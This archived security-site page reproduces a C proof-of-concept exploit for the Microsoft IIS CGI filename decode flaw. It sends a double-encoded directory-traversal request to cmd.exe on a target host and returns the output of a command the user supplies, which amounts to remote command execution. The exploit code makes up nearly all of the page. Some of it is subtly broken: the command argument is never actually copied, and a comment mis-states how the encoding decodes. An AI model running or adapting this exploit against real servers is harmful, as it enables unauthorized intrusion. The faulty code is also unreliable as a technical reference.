TUCoPS :: Web :: IIS :: execii~1.c

IIS CGI Filename Decode Error exploit 

/*
 *
 * execiis.c - (c)copyright Filip Maertens
 * BUGTRAQ ID: 2708 - Microsoft IIS CGI Filename Decode Error
 *
 * DISCLAIMER:    This  is  proof of concept code.  This means, this code
 * may only be used on approved systems in order to test the availability
 * and integrity of machines  during a legal penetration test.  In no way
 * is the  author of  this exploit  responsible for the use and result of
 * this code.
 *
 */

/* Might as well port this one too.
 * vacuum@technotronic.com
 */

#include <stdio.h>
#include <stdlib.h>

#ifdef WIN32
#pragma comment (lib,"Ws2_32")
#include <windows.h>
#include <winsock.h>
#define close closesocket
#else
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#endif
#include <sys/types.h>
#include <string.h>

int main(int argc, char *argv[])
{
	struct sockaddr_in sin;
	struct hostent	*ht;
	char recvbuffer[1];
	int create_socket;
	#ifdef WIN32
	WSADATA WSAData;
	#endif

	char request[8192]="GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";
	char cmd[1024]="";

	printf("iisexec.c | Microsoft IIS CGI Filename Decode Error |\n");
	printf("<filip@securax.be>\n");

	if (argc < 3)
	{
		printf(" -- Usage: iisexec [hostname] [command]\n");
		exit(-1);
	}

	#ifdef WIN32
		if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0) {
			printf("WSAStartup failed.\n");
			WSACleanup();
			exit(-1);
		}
	#endif

	if ((ht = gethostbyname(argv[1])) == 0)
	{
		#ifndef WIN32
        herror(argv[1]);
		#else
		fprintf(stderr, "Unable to resolve host %s\n",argv[1]);
		#endif
        exit(-1);
    }
	else
		memcpy(&sin.sin_addr, ht->h_addr_list[0], sizeof(sin.sin_addr));

	if (( create_socket = socket(AF_INET,SOCK_STREAM,0)) > 0 )
		printf(" -- Socket created.\n");

	sin.sin_family = AF_INET;
	sin.sin_port = htons(80);

	if (connect(create_socket, (struct sockaddr *)&sin,sizeof(sin))==0)
		printf(" -- Connection made.\n");
	else
	{
		printf(" -- No connection.\n");
		exit(1);
	}
	
	/* Modify this value to whichever sequence you want.
	*
	* %255c = %%35c = %%35%63 = %25%35%63 = /
	*
	*/
	strncpy(cmd, argv[2], strlen(cmd));

	strncpy(request, 
		   "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+",
		   sizeof(request));
 	 strncat(request, cmd, sizeof(request) - strlen(request));	
 	 strncat(request, "\n", sizeof(request) - strlen(request));

	memset(recvbuffer, '\0',sizeof(recvbuffer));
	printf("[%s]\n",request);
	
	send(create_socket, request, sizeof(request), 0);
	recv(create_socket, recvbuffer, sizeof (recvbuffer),0);

	if ( ( strstr(recvbuffer,"404") == NULL ) )
	{
		printf(" -- Command output:\n\n");
		while(recv(create_socket, recvbuffer, 1, 0) > 0)
		{
			printf("%c", recvbuffer[0]);
		}
	}

	else
		printf(" -- Wrong command processing. \n");

	close(create_socket);
	exit(0);
}

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH